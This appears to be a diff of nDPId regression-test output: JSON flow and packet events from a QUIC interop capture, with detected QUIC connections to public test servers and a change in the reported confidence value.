00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1603816434535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434535,"pkt":"pJGxgjQ5PKn0qB\/sht1gAJBbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYhUTOCgoKCggKh53oSKcUIwAARL7ptyuGj3sWoCfzmGYT9c5knffzFTiJ5lVJXbpctUGbKL5ySK19+FWpax4\/nAYQUfvCM\/bhsgFtS9G+ZFtPXpli7k9OwELHwQ20mBGQWbjmI7hP6morZpTeRWxaKack+BC0iQiX9\/LIrfrGdoT1oDoUDperL3\/EWfbsAzs51Fr37OKsXNxMOnNCWganJYQDoS1NHvgUii8j2RT7vFE3V9d23tm2baG7XTpJE\/KumpBsVLcT3VzQxufgdMiVwmhOfmQTPXaJDGA\/jRTiFeXg7nXwXEtAxzBQgrLuBhQxPykcUp0c2\/phwIU04regmPrsDteoZwKZzuohFTkgaiJgBEO37GhILvwwBeV77OMpz83mtpaFJrhJUhOB5vM0\/RgcMPtcx4bSZUJUYD6nBLhQJ\/GvQEu7UlOsfkiIrZE+ZKc7Xlk9faNEXsEX+cAq53XDHpAkkbtjxhoLLEgwqg9w2+pJHK905szCqPYz1ey662LeHpygS8mmmH\/gOERXnPY24ktfjRbIPk+3jjlRJg9AEQHddCfLs\/0YynFjxEK6SkUDk3GOa0sGfGsU7zt7rbEh4JS4h\/\/R08A7nHPChHXr\/7ZgHR966vNTPtSXBteBzHwou8p5yVwauN1gN5GaWb31oFnrNAxiwuz4e2fwfa69YtXI4XWHFBvj4iNrdRBF9sHDZoob5bniwmHivCxgMW4+Jtbnaqfrv4Sp3dq00y6\/ur4ZEHV5m4FIMmbgmAyq9vvgmIFyJKBMGegGOoZYhISRV4ufDNEsgtjnm1Ha96l8R2gH9UD5FvAjfB\/ZwRBGmgFyc1RY+15Vl0HTZ4Rr+yCWwF2I4UFS+jzuwD+H6WEkNUgBjeLztMlKSo7QMs7PpOgFdZAlYejckZA1WodUw\/1bgj\/U6KGLbos4yPh+0rFNO0QtSRdW2TgBAAQucKeIvxgOUjTBEAP34nCw3lpKpedULlo5yFoLMltnNpkze\/b+9gBG8\/1mSO3ivzeDC3y6mANlLBm2iJns641SQdnTkf3L8X6YeBJsMYcaaiKYOyuuOiyeZy0YQZa4g5mFBz1gCqnQwBTBq6z8JWs1a\/iBlFkdzl55MjJD1jFCxVWdLyjInYMNmKxijI+ky9lNUsSaDzc5mgZpk3C0ZBbV058wqQx49fSF44m14OWseuaF+VY+qapJWKKL5t18OkWciu9MrAdQ4l66KAXEOIsGmkn8zlOyO4gaBESlpwfIO6YAp9wh9uTR9L+wkJgDcSe\/JWX30SUzbiRxqTmU9\/OJu2YJTPKi8wBs0qops1o6F9bQ4myo5lBZyqDquGfUWvrEXAbX82yldqPSTFnXWZt1UdImRyp1aGJVLjK7WjTb+ZSUcMVvxEHERZUt6VlUBe9SscDBCFdepioRLv56MnqrV+s4p\/g3CZ2sX0A9nX\/xgQxdccpjrif7tgBq+g7rjwIDWgS4NTZeETjOCtp53wYAhZZ32G\/hgR
uBjIwqGUhTXHOoeOasvV+WD6Qh9WG\/ZAOn3eXObqDuYhD21bQbu7H9CTSFHgZo5\/P4wYz2WlEjbWMiQ9K7B5MQdxXUQYTDHm1OtDv1m9inaq9E9Mp1YP37ABzmfZ+XPVEzLA7x\/VqZvQgYfBYQAA=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1603816434542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434542,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAsZBAAEARzITAqAGAA3nyNu1wEVEE7LiZwwoKCgoI7mu7hqnhXwQAAETSneZc0FuQOOHT\/teiEyKQKqzHkPCOdcJLNU5VOm5QOz0aoCJBEfqd1iT7e6uyMoRT8wMX7assdH+rfwhkbtE0fDQ53avKQe54W1J5UEYikBP8CP81hlJVbphH435fnVTq7nYhJQx3T1Y6AQ2\/Im2so+HMSUWdbbnrP5LSk6E7PUTbsjJ7Z4IK2AyVHeK5bSLg80JZ1Sph0HZzQaEbqIMyi\/M6v3qgHFPF1JKKXsbwx36aShFPp5YRv\/soCC3iJDKx\/TOoopux88iYZkKX6xmVToWLTybIql7tHDaiQwlFHhBfrjhT6cVIuDMNZVXE8b8dgJrnGR4ypA9uhBp9z\/Snjb7kplkcAw9Yd0vXwuJxwvJbKYWpGBSBjpqgJK2NnsY91gg5TfSt3JN+70Jk3br16yCjz7tX60zGh5oP2DwLrrYetR3R0GFUOxDMh6G7aF3I80uIHLzKM5L7Cyq+eH+E4Oik6IopSkw7bwloBrghPMa9hxFBVEXX58oWV2xJT38EqSdgZFBF5dbInQYsnbTRjhDYyaiyt8vlg88mj5YsiwANcazCph4gIDWa4gyKspP8BKvUtXz02RGy3HX6Vo5Vamtwn+2PjOM+Q+DQVEQnn5msYlkn7ZY5ovQgE
gbBX+huA6I5hUWWsPR3M2Kzn\/TPASjM5rwK0KxSpO5g\/gQQfc1S7J7YuDP8zIp427rx9HJYduWfVC4rgRUnB6I166YLVcOlExTMzRX5aOez8BEzIES9YduVGcZhm9AP3doiK0e16CBoljKKN4NSkTnRww5pIG7SP9IPdlyMMhv\/F65HJ9\/Qdzi\/8AR0RRXgbK4KSLJ1ZazP98Eo4okuRh2hJvsVfDsF82aUOJ+5IPV21tikqeD52JJgCcbnY1xvwCMuI9Ev5Q1BzfBglIWFmd3vD8LInWrtA2LQjCeOq98mFJn6QDvRQu5wKPIA\/ZgOKwVAUTiw4oj9THEfNPce2Rwgs9BQNDAwTNfNzVG4Uo8HZPdnnHL7R4K8hI28\/uWO7cqQHN0rdSoqUztCrLRvMc8S2B6IG\/FwTC+hPTm4cIQtFOJMoo2kOuyujyZ1LEIJszajyM3US0Z7vDZ\/NVv7NhCjNliBh1qCCQmrc2ZARdMzfQTwRZSk4Qp8dafvvYQ1LF9kATiR56vOstwif8mcEeSGpGjxHRxxaPCnx1FqTSBlji1+\/mVUMSnwTjTbZ8+IlF5bvzWmxCP6SmcY3uiWmUe8ABNCdQ6oFUGX7MujoMfHqznJ22xd4jRp9Th8CAdO6AtXd2qNEMNXvt+leql1vYAShneyVo44syrCJhZftvKw0lIESx6N8bEm9qmNGkSLU3jwsr4qMQ4GeNejADIeIEW8ilf6RTOWWH8Ge9WQmD0aziJpeLMRGeBecvHxLqJRfNb4UoC\/aiW\/ii+JMaepnbYUiRD4TObTS04rz7zN9ijDMemj465LaVNq0Le86L1W7PC8e6cQH0cTJum0Jqv\/LLqUQa9dj8VqTQbmKBPwwLy4YSngRqKOkKFIREtmChIase\/5QfE6hq1lhcHS9+TUiZhdPLF2dtk3KG4eRvLu8IjED0rc3A3SIXUgqoM1eHsOUNqbWaqmodcwXD4BHHuC3EdxDzolau+txc2+xwm+NH4ee2DBykjljA=="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1603816434548,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434548,"pkt":"PKn0qB\/spJGxgjQ5ht1gAW9\/ACMR7CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9AbuT9AAjezDGAAAAAAAIlGmXKMyAAG3\/AAAd\/wAAHP8AABs="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1603816434551,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434551,"pkt":"PKn0qB\/spJGxgjQ5ht1gCVbMAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AbvrugAfxC\/CAAAAAAAI4QMvVRUj5m0KGio6\/wAAHQ=="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1603816434566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434566,"pkt":"PKn0qB\/spJGxgjQ5ht1gC985ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9Abu+QwArPVvlAAAAAAAIhDy+8x\/DNCJFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sht1gCjENBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABx\/ERUQTYsYfACgoKCggwbWAZ48sZPQAARL5w5HpjTfB6HE2JQjNEB1YmIe76YRB4wkvrzI8Py+EIKqBcyOOLSUBuzT912JXZ\/2dY3gtcHrCUweZkn\/T5Hj7RPGvPZqKFDdtBnWxfnsXvr8VhF5wnML7O4OsWP5nPvl6UO93+O4xio85bG8BLk14nxVMaEegFPQw41vQotLY1zGwG27cqyluUTVS52eHYVV4j83Dk9aui6JZsd4LVyJRUX2\/aUckCDuajGznu7FC2CzoKmlR9VSfkua99+L62GemAPTQ91VNnpbP5stk\/eROyYCQjK0Rz1x4lCPUHi2bIL+APn\/wkXXipr29g8XanJpO+FGEylpXWsJrrg0SI3jR39YuKgH\/KrVFhaTiB2Suy3PaKmi\/RzU8ypvxDJGoEdKNt7WXrvIvEzAROWanRVHPIqtyzoyATCv6emaC6YOFoMEpZbjomg2doT6BJk+EvC+YAEUaf8b3SEIGnXU8yeMJTcxsinB0KKzvXhxRAp7xoQkgseCm99W1kW+XHhN1QN\/TaCtfCfSVrUo2xGKhv3ymR2Vaw4omOsXp6J7Sjc0mbrS90K7ilwCM+Wfg0YoSkSDUSXY1AQnPTNjr2FMqanb49do1WhubRfE\/Ck0eHMZWPpGaO\/mph4jfOtDGM6OgXvUUlp5ROucFlBzCmVKkIyc2H8apiOM+07MDibQplJ4Az2+90761IvBgwfhlEPgdX1KDSHaJG4rPehCnx1Pp+yquyrKEzA5js4oFilyAy0vgDYNnz8kRaeeuCwuFEJgvXo8qRWj3noFvI+zM05NzQAJ+bmWMPgrG27iBYNGIvoGvmATqr8JgYwP4vU+hSyzxuJhQCf9Z1Yvi3GDN3YdoljnhaMO1Savux67rztE8c\/C8yDYwfMl4Hk9h2CnmhjXRv\/3esiIjaH9dPCD88ewNCiifrhvE9uNwL83wO4sr5zyTtZLeOfofME+dgPVQ7bgkbsRZetMQrrAt+izEoATXGeuXSCXJvZamlYZRQA9Y1hkw06gQpABA8+7BxNLKVRwU4R\/6Vyg6EQNzzD\/YA5VOGJvjRexKDRdxqrmlRTQq5hfIyAJHy\/HvrSIrmlbTwI7l2tlyS+TSdUxPcmU7n6Qs72zr3JKtijpeZTjiOvn5gH3Wz3LwmTGnGrpdVcS5m3nAy4dlf71QOIEEceuZ1zTiItSS1w+qpRUZsN7KqSmVbH5OnT58ueYRcxpx7o59KZHrxOOtppX89XTCUe1\/U6RKWIbGwK5B8t\/KtZN8LmG0kgcpcavl50oHuWDKuSGhWn78YjrWPPggvwb2mtAvV2xgf+KzFIUqCZ4tP72EyCyT8fsNUCySwHshLWySXBxdWfBkmiQPmX6KQcUxW7vUusJWyjH+HlW1ebLdsvC6JTIU9jvt6ymyaMyI\/rm50GWHDSBGar9xKv8vS9NCFORMVJp5Z83e9YH5EXVTDOpimXhA8N2hI9UWL\/X+c8xQkqXD5T0yYXpVHt7Nh
IvTwpfhjbEcUyf+BaoxMbBWX09ubEe4WSF3SBA7Dg+tiSOpxP11Hn04MactOeduGtV3YGVM9qWIdA3KpmTnOn7t96V09pndKxqCgN1gD4va9ZR8fB8j+u3uruPi0w2uDTcAmxYeEKNSLqA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAabBAAEARba\/AqAGAg58YxobPAbsE7IX8wwoKCgoIJv2XczUh4RIAAETSRoJYBYOeas73v5N6JeGR+D4vrTXWLHahs6zbYN2PSmfpsY6grm3D0Rg\/JjEbEbWdaTF+lx2JzZ6OUYarkFy+115N6m1b7gQSj030Q3\/SM1TNZj\/nSEEyPzf0GDxqQj4+nZP7WMShjiYRdKzXBQdLzKvZT8hwnZ4oB99gppgeNELMhqdd1SySqMlsoa6maZtwfk3WBUm6ygdONT8WTBN7k1sBIrC8taS2In6WoqpYjWgCgSqLDUPElTi6Wlu3qxPK0L89RJAyo7d95jjEyHvPN8tIah5cWcQDYEYe4huV1Wk4ReHtQlciAzAXks6By4Kk0EH6V\/vjIC8b6b+cCLYGgbSpy+UnT\/8ZA\/UQuk7xfmOopsc1Y98fvndGTrq5RKwehvcBoo5Mn7MwglvspnL5JNC3Wm1g6bxDaeVst7hRZBFiDlhiYaQ0Ab6hTr1EJaOuADWqvlem+VI3ScFJxVtLzW45MMzPqLsgDN0nwzvC5MgRoNBFenkwFuOGJL3cuoRXUyC3LM81pQYUYluofbI7QpbP2iRSlWRlGLd+f8zLs+KcyeL5yNSmFslj7bzWf\/JF6mVv58XYK55HQs40V9rrlz7Nj\/WpjPtqqYZhJzg0gyU\/lbPd8kQLgVED59I
tVwC3fIrmrMfcRnaanuGrvWgwIdywVEgwonSypaCKhJxenk3liQiSK4PIyLjElDxx0+CyQwtFMw0J6Rd2Mh0rRN9Qg6bbB+l+1HBn2AZjjpQRkF3k+wmrwQ3tlFWbURiRza9xq8onWimWZ4E80sO2DhLrdh5rcVJQeQt4rdLXRJq+nwgrsVxBbz2\/q8\/SLYx1O2bZBHh\/9BOOD1ryspmCVDPmvYwFGBraeD2+NW89wNvReyoP3HK0rCJ\/kri1cIGHbCcj++dh0yrqPt7Tf\/h83mJX2ClPu+4JxyyaiUh6X8GxTD5uMA+60fYmu+ll1hlhETX4lTtQ\/kXioQnJXjK9uS5\/mUX\/uGF7bLIle1fQUQwXMiKDhED8bldaUYDhxS5xaoXVFHYCkZD1G0bx4wNv8Yb\/Z6CBWe+ohQSURy647CyvtGSWeEchDWk746VaGkX3lxlsbKJKHBhqx7ONQcIFzj1Uy1jMc0AJU7zrl2kD8zQXmaNY4cUoA+GXy043sC2xwegQudxFTao\/gdfkQ\/q1NCe\/ml37Rl6EO3X3l9xGK4gSgGFs8v4x6Cb5DrR4JVJ5cHHSfWZa9UBPO1JdiEg8\/VX\/TMt1fQN+ReU4W02BaESJr6JTbZ2z47SHhCBYG6zwySaG7Lw65ubXXruEdd1pYjzU7fMm7oTz8Lh\/jPP1IP0yMSfVCRBlQiy9xU4NDYENzi1wl4tIvdERDQbkkbp0nWFv+lt+bkws2Q1vZy+gP3OrU8l5zDk0wZvYK1K+G1iWmyU8uDxuww\/HPy3G9m9DbYJTtzjTkrnXSnww3izdOvRZeolPfe0Z6lcnGUQ1\/j4+H4gBCwQLWrpcyqpCaXzS0ah6Mc6s8FdIMqnxX4rU8rBpXWoJ14XtBm3Uyy1wVEeRuIc4t8D3Za5OjHN5cGk13mZGhzHFhggCcpbM8VxO4s5FnO5gkpIVe3rp914hsLEJPh7ThKO5jLy2z2hTqHf5sMr6xpDc+5DzcXLzyMz+du5WiB2vEQ=="} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
